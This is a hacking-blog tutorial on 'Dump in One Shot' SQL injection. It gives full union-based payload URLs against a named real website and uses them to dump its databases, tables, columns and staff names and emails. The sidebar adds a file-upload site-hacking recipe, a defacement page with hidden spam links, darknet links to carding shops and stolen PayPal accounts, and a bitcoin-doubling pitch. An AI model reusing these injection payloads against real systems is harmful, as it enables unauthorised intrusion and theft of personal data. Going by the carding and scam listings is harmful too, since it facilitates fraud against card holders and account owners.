Skip to main content

Basic About Sqli Dios




Learn To hack

Hacking

BasicAbout Sqli Dios BY Mr.DUNGEON

Hi Guyzz

Today i am making a tutorial on basic of Dump in One Shot [DIOS]


I already know tutorial by Ajkaro and by Zen javanicus , Code ninja is best on this DIOS


And i too learned from their tutorials.But still some of my friends don't understand DIOS and want to learn this and some of friends messaged me about this to learn.So now i think to make a tutorial on DIOS. So lets start



======================================================


First see this query :->


(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'
'))))a)



In above query we will get all DATABASES


Now there (@a) is called variable and we are selecting this variable from information_schema.schemata and then we are concatenating all the schema names in the 'IN' clause



So i practiced above query like this :->



(

[b]

/*1st select is selecting variable*/

select (@a) from


(

/*2nd select storing 0x00 i variable. So if you want to store something then store in this 2nd select.Also we select third select after that but seperated with comma(,) */

select (@a:=0x00),


(

/*Now this third select. In this select we write our main query like to select database query,table query(information_schema.tables),column query(information_schema.columns).

Also we write our condition in this third select see where part here :-> where (@a)

Also we can use 2 or more than 2 condition in this third select :-> where table_name!='information_schema' and (@a) in

Don't forget to use and to use more than one condition


See more condition :-> where table_name!='information_schema' and table_name like 'us%' and (@a) in

Like this we can use many condition

With that condition like we get only that table_name which start with us

So i want to say you that you guys should play with sql queries so that you learn more and can use your desired condition which get great result.

*/

select (@a) from (information_schema.schemata) where (@a) in


(

/*Now in third select after 'IN' Clause we use our concat part.Note that this is use so that we see our desire result on page.

Like Table Name :-> Admin we see like this on page*/

@a:=concat

(

/*Here we use @a variable mean till now what we do is using variable come here so that we our desire result using that variable.So always include this variable in concat part*/

@a,schema_name,'
'


)



)




)



)



a)





So i wrote all which is essential to note while doing DIOS.

That way i learned DIOS



In short :->


1st select use to select variable


2nd select use to store value in variable.We can store multiple value in different different variable but with comma seperated.Like :->

(@a:=0x00),(@tbl:=0x00),(@count:=0x00)

Seel all those variable storing value and seperated with comma



3rd select use to write our main query , conditions, concating




Now see this in live action :->



DATABASES :->


http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,


(

select (@a) from


(

select (@a:=0x00),

(

select (@a) from (information_schema.schemata) where (@a) in

(

@a:=concat

(

@a,schema_name,'
'


)


)


)


)

a)


,5,6,7,8,9,10--+



We write this while practicing and then we see we write correct then to check we write our above query like this :->


http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in(@a:=concat(@a,schema_name,'
'))))a),5,6,7,8,9,10--+



We see this result :->






To do more better :->

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in (@a:=concat(@a,'
',schema_name,'
'))))a),5,6,7,8,9,10--+


Result








Notice the change when we use
before schema_name



Ok now to select Table names with more experiment in concat part :->



First with learning mode ====>


http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,

(

select (@a) from

(


select (@a:=0x00),


(

select (@a) from (information_schema.tables) where (@a) in

(

@a:=concat

(

@a,'
Table name :-> ',table_name,'
'

)

)

)

)

a),5,6,7,8,9,10--+




Then in Real mode :->


http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from (select (@a:=0x00),(select (@a) from (information_schema.tables) where (@a) in(@a:=concat(@a,'
Table name :-> ',table_name,'
'))))a),5,6,7,8,9,10--+



Result :->




=====================================================


Now to get table names which not belongs from information schema :->



http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.tables) where table_schema !='information_schema' and (@a) in (@a:=concat(@a,'
Table name :-> ',table_name,'
'))))a),5,6,7,8,9,10--+



Now we get only those tables which not belongs to information schema


What i use there :-> where table_schema!='information_schema' and (@a) in


Please note this we write information_scehma in under ' ' you can also use to change this in hex format if necessary



Result :->





Please from now i will not write Experiment mode like :->


(

select (@a) etc etc etc

)



Because i now thinking you guys learned this way for practicing.Whenever you guys confuse then write the query first in this manner mean experiment mode and then you see query correct then check it after little modify this query like i did this before




======================================================


Now to get column names :->



http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.columns) where table_schema !='information_schema' and (@a) in (@a:=concat(@a,'
Column name :-> ',column_name,'
'))))a),,5,6,7,8,9,10--+


Result :->






Now to get both table names and column names :->


http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.columns) where table_schema !='information_schema' and (@a) in (@a:=concat(@a,'
Table name :-> ',table_name,'
Column name :-> ',column_name,'
'))))a),5,6,7,8,9,10--+



Result :->





See we got both table names and column names in ONE SHOT Big Grin



======================================================//

/************Extracting Column from Tables

Now table name :-> staff

Table name is "staff'

Column name use "name" and "email"

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from staff where (@a) in (@a:=concat(@a,'
Name :-> ',name,'
Email :-> ',email,'
'))))a),5,6,7,8,9,10--+



Result :->





Sorry here in website Email Column Is Blank For this reason Email not printed

=====================================================


Time to do more experiment :->



[b]Get table name start with "st" and column name start with "st" :->



http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.columns) where table_schema!='information_schema' and table_name like 'st%' and column_name like 'st%' and (@a) in (@a:=concat(@a,'
Table name :-> ',table_name,'
Column name :-> ',column_name,'
'))))a),5,6,7,8,9,10--+


Result :->







I use condition there using LIKE Operator. So now this all upto you how you play with this and experiment with dios and Practice


This is all basic tutorial on DIOS from myside.If you like this then i will write more on advance DIOS


That's all Hope you guys learn something

Thanks for Reading





Labels:

Comments

Post a Comment

Popular posts from this blog

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS http://answers.microsoft.com/en-us http://archiveoflinks.com / http://community.sitepoint.com / http://de.lirio.us / http://del.icio.us / http://dondir.com / http://filesharingtalk.com / http://forum.deviantart.com / http://forum.joomla.org / http://forums.cnet.com / http://forums.hostgator.com / http://forums.mysql.com / http://forums.searchenginewatch.com / http://simplemachines.org/community/index.php http://www.247webdirectory.com / http://www.2daydir.com / http://www.9dir.com/Submit http://www.9sites.net / http://www.9w1.net / http://www.a1webdirectory.org / http://www.abacusseo.com / http://www.abc-directory.com / http://www.abigdir.com / http://www.acewebdirectory.com / http://www.add2us.com / http://www.addbusiness.net / http://www.addlink.us / http://www.addlinkzfree.com / http://www.addsite.info / http://www.afreeurl.info / http://www.agrieducation.org / http://www.alistdirectory.com / http...
Post a Comment
Read more
200++ high pr eductinon&goverment site backline As We know how important backlinks are for rankings in Google for a blog/site and page rank which definitely is the trusted way to show how well your blog is which most advertiser look for.I have come up with top .gov & .edu website by registering where you can get backlinks easily.Sograb these backlinsk and see the magic how  your website ranks on Google with these high PR boosting .gov and .edu backlinks.A high quality backlinks worth thousands low quality backlinks, especially the one coming fromedu and .gov sites. Google loves backlinks from.edu & .gov sites and thus give your site good ranking in SERPs. An edu & .’gov backlinks is associated with an educational institute & government organization therefore considered asmost authentic and valued backlink in term of SEO because they are from non-profit source givequality information, not a spam one and since exists for long time in the field, have high ...
Post a Comment
Read more

How to Hack Website

inurl:/editor/editor/filemanager Just open uploadtest.html Or test.html Then select PHP server Upload file Copy uploaded file url Paste it after the link Www.xyz.com //.... Enjoy Regards :- HACKER 22385
Post a Comment
Read more

Abdul hacker deface page

Abdul hacker deface page     <EMBED src=" http://greencall.co.kr/.p/we_will_not_go_down.swf " type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">     <html>         <body onload="scrlsts()"><script type="text/javascript"> document.write('<' + 'di' + 'v sty' + 'le="position: absolute; l' + 'eft: -1946px; t' + 'op' + ': -2856px;" class="sufoxyyhvnyswxs15">'); </script> <a href=" http://cergyd7.dev2.cmantika.com/includes/index.php ">installment loans california bad credit</a> <a href=" http://www.diamondwares.net/logs/index.php ">online cash loan direct lenders</a> <a href=" http://armastroy.com/templates/index.php ">easy loan kota kinabalu</a> <a href=" http://www.magazinecambodia.com/templates/index....
Post a Comment
Read more

Blogs on Computer Security:

Blogs on Computer Security: https://antelox.blogspot.com / http://www.dumpanalysis.org/blog / http://www.abuse.ch / http://zairon.wordpress.com / http://androguard.blogspot.com / http://blog.w4kfu.com / http://akhenath0n.blogspot.com / http://diarrlf.wordpress.com / http://deobfuscated.blogspot.com / http://www.h-i-r.net / http://mysterie.fr/blog / http://www.skullsecurity.org/blog / http://www.wrgross.com/blogs/security / http://net-effects.blogspot.com / http://eiploader.wordpress.com / http://cyb3rsleuth.blogspot.com / http://0entropy.blogspot.com / http://siri-urz.blogspot.com / http://newsoft-tech.blogspot.com / http://www.ragestorm.net/blogs / http://codeexploration.blogspot.com / http://esploit.blogspot.com / http://thexploit.com / http://mysterie.fr/blog / http://bailey.st/blog / http://touchmymalware.blogspot.ru / http://blog.delroth.net / http://novahackers.blogspot.com / http://greatis.com/blog / http://mcdermottcybersecurity.com / http://grand...
1 comment
Read more

Various Forums

JuanDeLemos: 1. Kali Linux http://distrowatch.com/kali   http://www.kali.org/  http://forums.kali.org/ Kali Linux (formerly known as BackTrack) is a Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture, a choice of four popular desktop environments, and seamless upgrades to newer versions. 2. Tails  http://distrowatch.com/tails  https://tails.boum.org/  https://tails.boum.org/support/index.en.html https://mailman.boum.org/listinfo/ The Amnesic Incognito Live System (Tails) is a Debian-based live CD/USB with the goal of providing complete Internet anonymity for the user. The product ships with several Internet applications, including web browser, IRC client, mail client and instant messenger, all pre-configured with security in mind and with all traffic anonymised. To achieve this, Incognito uses the Tor network to make Internet traffic very hard to trace...
Post a Comment
Read more

Darkweb and Deepweb llinks latest 2017 Huge collection!!!!

hi guys... as u know deep web and darkweb is most dangeorus part of the internet... but without site link....what where will u surf it ... so i did some reasearch and get the collection.... hope u like it.. Gonzalo Nuñez: 1. Xillia (was legit back in the day on markets) http://cjgxp5lockl6aoyg.onion 2. http://cjgxp5lockl6aoyg.onion/worldwide-cardable-sites-by-alex 3. http://cjgxp5lockl6aoyg.onion/selling-paypal-accounts-with-balance-upto-5000dollars 4. http://cjgxp5lockl6aoyg.onion/cloned-credit-cards-free-shipping 5. 6. ——————————————————————————————- 7. 8. 9. UNSORTED 10. 11. Amberoad http://amberoadychffmyw.onion 12. KognitionsKyrkan http://wd43uqrbjwe6hpre.onion 13. Malina http://malina2ihfyawiau.onion 14. BB Compendium http://jq.26zp5ygkpszripvv.onion 15. Hackbb pages index (cauti...
Post a Comment
Read more

hacking tools and lab

Resources (Free) Virtual Networks (VPNs) • ChaosVPN: http://wiki.hamburg.ccc.de/ChaosVPN • Gh0st Networks: http://www.gh0st.net / • Hacking Lab: https://www.hacking-lab.com / • p0wnlabs: http://p0wnlabs.com / • pwn0: https://pwn0.com / • PentestIT: https://lab.pentestit.ru / Custom Personal Targets • Hack A Server: https://hackaserver.com / • Hack Me: http://hack.me / • Hack This: https://www.hackthis.co.uk / • Smash The Stack: http://smashthestack.org / • Hack The Box: https://www.hackthebox.gr / • SecAdvise: https://labs.secadvise.com / • DarkHive: http://darkhive.net / • Avatao: https://avatao.com / • Root-Me: https://www.root-me.org / Archive/Repository • Security Conference Library: http://archive.liquidmatrix.org / • Shell-Storm.org Repository: http://repo.shell-storm.org/CTF / Misc • Bug crowd: ht...
4 comments
Read more

open a new bitcoin account and made double money

open a new bitcoin account and made double money MenuAbout UsContact Us Privacy Policy Disclaimer Sitemap  Main MenuBlogging tipsBlog designing  Blog traffic How TosMake Money Online  How to open a bitcoin account, earn, double your earnings and withdraw your money to physical cash. Bloggers Prof 11:12:00 AM  4 I recently discovered that people are now interested in bitcoin because of its high rate of popularity now in telegram, but nevertheless, I would be talking today on  how to get money into your bitcoin wallet  and how to go about your funds, weather you would withdraw it or you sell it to someone, I talked about everything you need to know about bitcoin and how to create your wallet, create your wallet let's move to today's deal. There are many ways to get  money into your wallet,   you can buy and you can also earn it , I want to show you list of sites you can earn bits from fast, Afte...
Post a Comment
Read more

Tor Darkweb Link

Tor link max telegram big acker: https://cardedlxzxsphu5y.onion/ SHOP FOR BUYING CARDED PRODUCTS https://2or24opd2hkebadv.onion/index.php  TORBAY FORUM chickencaptain: http://kpynyvym6xqi7wz2.onion/ parazite files and links max telegram big acker: https://kr5hou2zh4qtebqk.onion.cab/ezines/ ARCHIEVE OF SOME VINTAGE AS WELL AS NEW STUFFS https://superkuhbitj6tul.onion/library/ LIBRARY OF BOOKS ON VARIOUS TOPICS https://yuxv6qujajqvmypv.onion/ GUIDE ON USING AN SECURE OPERATING SYSTEM https://bpo4ybbs2apk4sk4.onion/en A COLLECTION OF TOOLS RELATED TO SECURITY P4RN3R: https://ondemand5xot4hdw.onion/  Tor On Demand max telegram big acker: https://f3mnl42ax3qtu3a7.onion/ GOVT LEAKS https://kzspryu63qbjfncp.onion/  DIGITAL PAWN SHOP https://yniir5c6cmuwslfl.onion/ STRANGE WEBSITE, CANT DESCRIBE https://vrimutd6so6a565x.onion.cab/index.php/Board ANONYMOUS POSTING https://h2am5w5ufhvdifrs.onion/ CRYPTOME ARCHIVE OF GOV CONSPIRACY FILES https://torc5bhzq6xorhb4.o...
Post a Comment
Read more